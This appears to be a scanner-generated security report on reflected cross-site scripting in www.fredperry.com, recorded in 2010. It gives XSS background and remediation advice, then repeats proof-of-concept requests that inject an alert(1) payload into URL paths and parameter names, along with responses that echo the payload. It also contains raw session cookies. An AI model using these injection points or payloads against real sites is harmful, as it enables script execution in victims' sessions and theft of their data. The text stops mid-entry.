Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a260"-alert(1)-"b04c9bfebf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus1a260"-alert(1)-"b04c9bfebf1/careers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=6lgtsf14sq6tgh58hvj7o36lt3; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus1a260"-alert(1)-"b04c9bfebf1/careers/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2112"-alert(1)-"7af98893783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/careerse2112"-alert(1)-"7af98893783/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=6cb751jfeultlo2nf47np4ppg5; expires=Tue, 09-Nov-2010 17:20:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus/careerse2112"-alert(1)-"7af98893783/"); //]]> ...[SNIP]...
1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/aboutus/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ced5c"-alert(1)-"791ad1593cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c3b6"-alert(1)-"920d2168f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus6c3b6"-alert(1)-"920d2168f26/security/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=grqcphacqsbo1480b6jtpofki7; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus6c3b6"-alert(1)-"920d2168f26/security/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4522d"-alert(1)-"c1b9f21713f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/security4522d"-alert(1)-"c1b9f21713f/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=02tsp3nrifb4436vg02ro7s4l0; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus/security4522d"-alert(1)-"c1b9f21713f/"); //]]> ...[SNIP]...
1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/aboutus/security/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e49"-alert(1)-"987bc5a30f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bae7"-alert(1)-"fc574894142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus6bae7"-alert(1)-"fc574894142/terms/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9r493rjv2rujrhmdkb6it0kgu1; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus6bae7"-alert(1)-"fc574894142/terms/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c69"-alert(1)-"63f5ec0be34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/termsa7c69"-alert(1)-"63f5ec0be34/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=v21cj99monqcosil98b2hq65s5; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/aboutus/termsa7c69"-alert(1)-"63f5ec0be34/"); //]]> ...[SNIP]...
1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/aboutus/terms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4969"-alert(1)-"37e10aae9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3885"-alert(1)-"9526fa7e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessoriesb3885"-alert(1)-"9526fa7e2c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=k2rp2ik1110pdvlrndo6p1vf63; expires=Tue, 09-Nov-2010 17:05:22 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/accessoriesb3885"-alert(1)-"9526fa7e2c/"); //]]> ...[SNIP]...
1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/accessories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dec"-alert(1)-"ff296b429aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories/?87dec"-alert(1)-"ff296b429aa=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaeba"-alert(1)-"564e77c9441 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessorieseaeba"-alert(1)-"564e77c9441/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:04:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=773q5gsdpnv68cnfegbhjdu6s6; expires=Tue, 09-Nov-2010 17:04:40 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/accessorieseaeba"-alert(1)-"564e77c9441/men/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0c1"-alert(1)-"54c23c18eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories/menca0c1"-alert(1)-"54c23c18eea/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=q7rt87m86laigg4gl21ne3jr05; expires=Tue, 09-Nov-2010 17:05:02 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/accessories/menca0c1"-alert(1)-"54c23c18eea/"); //]]> ...[SNIP]...
1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/accessories/men/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590b7"-alert(1)-"544c5a1307c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories/men/?590b7"-alert(1)-"544c5a1307c=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fe7"-alert(1)-"0b8ff4d883b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories11fe7"-alert(1)-"0b8ff4d883b/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:04:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=41433rkoa4tsrfs0gjisr0kgh3; expires=Tue, 09-Nov-2010 17:04:20 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/accessories11fe7"-alert(1)-"0b8ff4d883b/women/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebf0"-alert(1)-"bda42614438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accessories/women5ebf0"-alert(1)-"bda42614438/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:04:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=rl1ftnqr0ih5pd8j1k1v00h7j4; expires=Tue, 09-Nov-2010 17:04:38 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/accessories/women5ebf0"-alert(1)-"bda42614438/"); //]]> ...[SNIP]...
1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/accessories/women/
Issue detail
